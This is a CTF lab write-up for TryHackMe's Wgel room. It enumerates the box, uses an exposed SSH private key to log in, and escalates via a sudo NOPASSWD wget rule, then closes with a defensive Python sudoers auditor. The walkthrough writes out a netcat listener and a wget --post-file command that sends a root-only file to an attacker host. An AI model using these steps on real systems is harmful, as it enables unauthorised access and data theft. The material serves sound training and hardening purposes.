TryHackMe: Wgel write-up
In this article we’ll tackle an easy CTF on TryHackMe. We’ll enumerate a Linux box, find misplaced credentials and exploit a common Linux tool to escalate our privileges and exfiltrate information.
Link: https://tryhackme.com/room/wgelctf
Difficulty: Easy
Authors: MrSeth6797
First steps and enumeration
Our journey into this CTF challenge begins with a full-range nmap scan to identify the services listening on the target machine. The scan revealed two open ports: SSH on port 22 and an HTTP server on port 80, both candidates for further exploration. The HTTP server is running Apache httpd 2.4.18 on Ubuntu, while the SSH service is OpenSSH 7.2p2 Ubuntu 4ubuntu2.8:
$ nmap -sV -sT -p- -oN nmap/full-scan.nmap $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-15 15:18 CET
Nmap scan report for 10.10.222.165
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds
The web server appears to host nothing but the default page bundled with the Apache installation. However, a quick GoBuster scan with the directory-list-lowercase-2.3-medium.txt wordlist shows that there is more than meets the eye:
$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt | tee gobuster.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/sitemap              (Status: 301) [Size: 316] [--> http://10.10.222.165/sitemap/]
Progress: 62904 / 207644 (30.29%)
There’s a hidden /sitemap directory. An inspection of the website’s source code also revealed a comment potentially hinting at a username:
<!-- Jessie don’t forget to udate the website. -->
The name in that comment looks like a username, which could be important later on. Next, we visited the /sitemap area of the website.
It’s a template from ColorLib, but nothing stood out at first. To dig deeper, I ran GoBuster against /sitemap as well. When the initial scan with one wordlist didn’t show results, I switched to the dirb common.txt wordlist (the one shown in the command below) for a second pass:
$ gobuster dir -u http://$IP/sitemap -w /usr/share/wordlists/dirb/common.txt | tee gobuster-sitemap.log
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.222.165/sitemap
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.222.165/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.222.165/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.10.222.165/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.222.165/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 319] [--> http://10.10.222.165/sitemap/js/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
There is a very interesting hidden directory called .ssh. Note that Apache blocked the .ht* files (403) but happily served this directory. If we take a peek inside we find an SSH private key. We can make a handy backup copy of it on our machine and use it with the username jessie to access the target box. Inside Jessie’s Documents directory we can finally get the user flag.
Privilege escalation
After gaining access to the system, we proceeded to enumerate its configuration further. A quick check with sudo -l revealed a particularly interesting privilege assigned to the user jessie: the system allows jessie to execute wget as root without a password:
$ sudo -l
Matching Defaults entries for jessie on CorpOne:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
We can’t list the contents of the /root directory, but guessing that the root flag is called root_flag.txt (just like the user flag was named user_flag.txt), we can use wget to try and grab it.
First, let’s set up a listener on our local machine to receive the file. This can be done with netcat:
$ nc -vlnp 1337
Now let’s use wget to send the contents of root_flag.txt from the target system to our listener. Because the sudo rule lets wget run as root, its --post-file option reads the file with root privileges and ships it as the body of an HTTP POST:
$ sudo wget --post-file=/root/root_flag.txt http://<Attacker IP>:1337
And just like that, we capture the root flag right in our terminal.
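The whole privilege escalation rests on one sudoers line, and the fact that it is NOPASSWD is what made a leaked SSH key alone sufficient. The script below is an added example written for this write-up, not code from the room or its author: it parses sudoers-style user specifications and flags root-equivalent grants of binaries that can read or write arbitrary files. The sample file is constructed and modelled on the sudo -l output above; RISKY_BINARIES is an assumed starting list to be extended from your own baseline.

```python
import re
from dataclasses import dataclass

# Binaries that give more than their nominal purpose when they may run as root.
# Assumed starting list for this example; extend it from your own baseline.
RISKY_BINARIES = {
    "wget": "reads any file as root (--post-file) and writes any file as root (-O)",
    "curl": "reads any file as root (-d @file) and writes any file as root (-o)",
    "tee": "writes any file as root",
    "vim": "can spawn a shell as root",
    "less": "can spawn a shell as root",
}

# sudoers tags and the tag each one overrides
TAGS = {"NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD", "NOEXEC": "EXEC", "EXEC": "NOEXEC",
        "SETENV": "NOSETENV", "NOSETENV": "SETENV", "LOG_INPUT": "NOLOG_INPUT",
        "NOLOG_INPUT": "LOG_INPUT", "LOG_OUTPUT": "NOLOG_OUTPUT", "NOLOG_OUTPUT": "LOG_OUTPUT"}
TAG_RE = re.compile(r"^(" + "|".join(TAGS) + r"):\s*")
# user  host=(runas) [TAG:] cmd [, [TAG:] cmd ...]
RULE_RE = re.compile(r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    who: str
    command: str
    severity: str
    reason: str


def logical_lines(text):
    """Yield sudoers lines with backslash continuations joined; comments and blanks dropped."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        line, buf = buf + line, ""
        if line and not line.startswith("#"):
            yield line


def parse_rules(text):
    """Return (who, runas_user, tags, command) for every user specification."""
    rules = []
    for line in logical_lines(text):
        m = RULE_RE.match(line)
        if not m or line.split()[0] in SKIP:
            continue
        runas = (m.group("runas") or "root").split(":")[0].strip()
        tags = set()
        for item in m.group("cmds").split(","):
            item = item.strip()
            # A tag sticks to every following command in the list until overridden.
            while True:
                t = TAG_RE.match(item)
                if not t:
                    break
                tags.discard(TAGS[t.group(1)])
                tags.add(t.group(1))
                item = item[t.end():]
            if item:
                rules.append((m.group("who"), runas, frozenset(tags), item))
    return rules


def audit_sudoers(text):
    """Flag root-equivalent grants that amount to arbitrary file read/write as root."""
    findings = []
    for who, runas, tags, cmd in parse_rules(text):
        if runas not in ("ALL", "root"):
            continue                      # only root-equivalent grants matter here
        nopass = "NOPASSWD" in tags
        parts = cmd.split()
        binary = parts[0].rsplit("/", 1)[-1]
        args = parts[1:]
        if cmd == "ALL":
            findings.append(Finding(who, cmd, "high" if nopass else "info",
                                    "unrestricted root" + (" without a password" if nopass else "")))
        # With fixed arguments sudo matches the command line exactly, so only an
        # argument-less entry, or one with a wildcard, leaves the user free to
        # add options such as --post-file.
        elif binary in RISKY_BINARIES and (not args or any("*" in a for a in args)):
            reason = RISKY_BINARIES[binary]
            if args:
                reason += "; wildcard arguments can match extra options (and spaces)"
            if nopass:
                reason += "; no password needed, so a leaked SSH key alone is enough"
            findings.append(Finding(who, cmd, "high", reason))
    return findings


# Constructed sample modelled on the CorpOne box; not the real file.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
jessie   ALL=(ALL : ALL) ALL
jessie   ALL=(root) NOPASSWD: /usr/bin/wget
www-data ALL=(root) NOPASSWD: /usr/bin/tee /var/log/app.log
ops      ALL=(root) /usr/bin/wget -O /var/www/html/*, \\
         /bin/systemctl restart apache2
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.who}: {f.command} -> {f.reason}")
```

The www-data entry in the sample is deliberately not flagged: tee pinned to one fixed path is what a minimal grant looks like. The ops entry is flagged even though it requires a password, because a wildcard in the arguments hands the option parsing back to the user. Run it over /etc/sudoers and the files under /etc/sudoers.d as root, or feed it the output of `sudo -l` after reformatting, and review every high finding against what the grant was actually meant to allow.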